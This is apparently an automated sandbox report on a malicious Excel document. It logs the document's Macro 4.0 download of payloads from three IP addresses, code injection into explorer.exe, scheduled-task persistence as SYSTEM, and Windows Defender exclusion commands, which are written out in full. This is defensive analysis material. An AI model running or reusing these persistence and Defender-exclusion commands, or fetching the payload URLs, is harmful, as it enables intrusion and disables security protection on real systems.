Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 4_2_1000D01F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW, 4_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW, 5_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW, 8_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_0008AEB4 FindFirstFileW,FindNextFileW, 10_2_0008AEB4

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 4_2_10005F82
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress, 4_2_1000DFAD
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02834495 or ebx, dword ptr fs:[00000030h] 4_2_02834495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D84495 or ebx, dword ptr fs:[00000030h] 8_2_00D84495
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00085A61 RtlAddVectoredExceptionHandler, 5_2_00085A61

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2008 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2008 base: AE102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2608 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2608 base: AE102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2540 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2540 base: AE102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 408 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 408 base: AE102D value: E9 Jump to behavior
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Compensation-1730406737-09272021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_000831C2 CreateNamedPipeA, 5_2_000831C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 4_2_1000980C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 4_2_1000D01F
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491509 Sample: Compensation-1730406737-092... Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 71 Document exploit detected (drops PE files) 2->71 73 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->73 75 Sigma detected: Schedule system process 2->75 77 7 other signatures 2->77 9 EXCEL.EXE 194 38 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 65 190.14.37.178, 49165, 80 OffshoreRacksSAPA Panama 9->65 67 185.183.96.67, 49166, 80 HSAE Netherlands 9->67 69 185.250.148.213, 49167, 80 FIRSTDC-ASRU Russian Federation 9->69 59 C:\Users\user\...\44466.7022844907[3].dat, PE32 9->59 dropped 61 C:\Users\user\...\44466.7022844907[2].dat, PE32 9->61 dropped 63 C:\Users\user\...\44466.7022844907[1].dat, PE32 9->63 dropped 93 Document exploit detected (UrlDownloadToFile) 9->93 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        file5 signatures6 process7 signatures8 27 regsvr32.exe 18->27         started        30 regsvr32.exe 20->30         started        32 regsvr32.exe 22->32         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->85 87 Injects code into the Windows Explorer (explorer.exe) 24->87 89 Writes to foreign memory regions 24->89 91 2 other signatures 24->91 34 explorer.exe 8 1 24->34         started        process9 file10 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 27->95 97 Injects code into the Windows Explorer (explorer.exe) 27->97 99 Writes to foreign memory regions 27->99 37 explorer.exe 8 1 27->37         started        101 Allocates memory in foreign processes 30->101 103 Maps a DLL or memory area into another process 30->103 40 explorer.exe 30->40         started        43 regsvr32.exe 30->43         started        45 explorer.exe 32->45         started        53 C:\Users\user\Drezd.red, PE32 34->53 dropped 105 Uses cmd line tools excessively to alter registry or file data 34->105 47 reg.exe 1 34->47         started        49 reg.exe 1 34->49         started        signatures11 process12 file13 79 Uses cmd line tools excessively to alter registry or file data 37->79 81 Drops PE files to the user root directory 37->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 37->83 51 schtasks.exe 37->51         started        55 C:\Users\user\Drezd2.red, PE32 40->55 dropped 57 C:\Users\user\Drezd1.red, PE32 45->57 dropped signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.183.96.67
 unknown Netherlands
60117 HSAE false
190.14.37.178
 unknown Panama
52469 OffshoreRacksSAPA false
185.250.148.213
 unknown Russian Federation
48430 FIRSTDC-ASRU false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://190.14.37.178/44466.7022844907.dat false
  • Avira URL Cloud: safe
 unknown
http://185.250.148.213/44466.7022844907.dat false
  • Avira URL Cloud: safe
 unknown
http://185.183.96.67/44466.7022844907.dat false
  • Avira URL Cloud: safe
 unknown